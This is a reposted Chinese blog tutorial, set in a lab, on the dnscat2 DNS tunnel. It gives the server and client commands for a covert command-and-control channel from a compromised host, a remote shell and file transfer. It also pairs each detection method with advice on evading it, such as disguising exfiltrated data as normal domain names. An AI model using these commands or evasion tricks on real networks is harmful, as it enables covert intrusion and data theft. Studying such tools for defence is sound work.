内网渗透系列:内网隧道之dnscat2

Posted 思源湖的鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网渗透系列:内网隧道之dnscat2相关的知识,希望对你有一定的参考价值。

目录

前言

本文研究DNS隧道的一个工具,dnscat2

github:https://github.com/iagox86/dnscat2

一、概述

1、简介

最后更新于2020年,客户端是用 C 编写的,服务器是用 ruby 编写

IP over DNS,通过 DNS 协议创建加密的命令和控制 (C&C) 通道,直接运行工具即可实现数据传输、文件操作等命令和控制功能

  • 利用合法DNS服务器实现DNS隧道
  • C/S(dnscat/ dnscat2.rb)结构
  • 默认混合使用TXT、CNAME、MX记录加密(base64)传输数据
  • 支持直连/中继
  • 提供好多命令和服务

2、原理

DNS原理见:一文搞明白DNS与域名解析

客户端:

  • 在受感染的计算机上运行。C语言编写的,具有最小可能的依赖性。

  • 运行模式如大多DNS隧道工具一样:Dnscat2客户端->DNS服务商->Dnscat2服务端。

  • 如果没有购买域名,还可以在UDP/53上使用直连。它们会更快,但它在数据包中更明显,防火墙经常会阻止此模式

服务端:

  • Ruby语言编写,在服务器上运行。它除了监听在UDP/53上发送给它的消息之外,还要指定它应该监听哪个域名。

  • 当它接收其中一个域名的流量时,它会尝试建立DNS连接。如果它接收到其他流量,它默认忽略它,当然你也可以在上游转发它。

3、用法

(1)服务端

安装

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install

使用

#启动
sudo ruby./dnscat2.rb abc.com --secret=123456   # abc.com 自定义DNS传输的域名;--secret 自定义连接密码
sudo ruby./dnscat2.rb --dns host=127.0.0.1,port=533 --secret=123456   #设置监听端口
sudo ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache   #--security 规定了安全级别;--no-cache 禁止缓存

(2)客户端

安装

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make

使用

dnscat --secret=123456 abc.com 
dnscat --dns server=<your dnscat2 server ip>,port=553 --secret=123456   

(3)使用隧道

内置了很多服务

服务端的控制台输入:windows,即可以看到一个客户端上线:

1 :: command (DESKTOP-7NSDT5)……

1表示该客户端ID,如果使用window -i 1,即可进入该通道;
键入shell,即可得到一个半交互shell!(功能有点强)

help可查看控制台支持的命令,常用的有:

quit (退出控制台)
kill <id> (中断通道)
set(设值,比如设置security=open)
windows(列举出所有的通道)
window -i <id>(连接某个通道)

连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):

clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell)
download/upload(两端之间上传下载文件)
supend(返回到上一层,等于快捷键ctrl+z)

二、实践

1、测试场景

(1)攻击机

Kali2021 192.168.10.128

(2)DNS服务器

windows server 2008 :192.168.10.200

设置静态IP,参见https://blog.csdn.net/pockeyfan/article/details/42063683

新建A记录,指向服务端kali

新建一个委托(即NS记录)指向刚刚设定的A记录的域名

再建一个A记录指向windows server自己

(3)目标机

Ubuntu 18.04 192.168.10.129

由于模拟的是DNS服务器是真正的权威服务器,即目标机应该能DNS解析到DNS服务器,所以要把目标机的DNS解析改下


nslookup检测下

2、建立隧道

(1)服务端

安装

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install

启动

(2)客户端

安装

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make

启动

(3)使用

在创建的window 1 中可以进行下步命令
dnscat提供了大量命令,用可以获取,这里展示一个shell

3、抓包看看

建立隧道

心跳包,CNAME、TXT、MX混用,但是域名是异常域名

三、探索

1、源码与分析

TODO

2、检测与绕过

(1)特征字符串

工具作者的恶趣味,内容里加了个dnscat

绕过方法:删掉即可

(2)异常DNS数据包数量

虽然将命令放在了心跳包里,没有造成某时刻的密集数据包,但是总的数据包数量还是大于正常的,且心跳包的间隔也是个问题

绕过方法:心跳包间隔拉长,甚至随机;数据包数量换UDP socket重新建立

(3)异常域名

所有包的域名都很异常,可以通过长度、熵等办法检测

绕过方法:心跳包用正常域名,命令可以base64后拆分

比如现在要把一个文件名 finalexamanswer.doc 传出去
base64 一下 -> ZmluYWxleGFtYW5zd2VyLmRvYw
然后编码常用域名,变成 Zm -> zone.music.domain,lu -> login.user.domain,YW``yun.web.domain …

(4)特殊记录类型

虽然已经TXT、MX、CNAME混用了,但还是有点特殊

绕过办法:加入A和AAAA混合

结语

dnscat2将C2直接写进了工具中,这很厉害,同时也很有可能带来更多特征

《新程序员》:云原生和全面数字化实践 50位技术专家共同创作,文字、视频、音频交互阅读

以上是关于内网渗透系列:内网隧道之dnscat2的主要内容,如果未能解决你的问题,请参考以下文章

内网渗透系列:内网隧道之DNS隧道

内网渗透系列:内网隧道之DNS隧道

内网渗透系列:内网隧道之icmp_tran

内网渗透系列:内网隧道之pingtunnel

内网渗透系列:内网隧道之NATBypass

内网渗透系列:内网隧道之icmpsh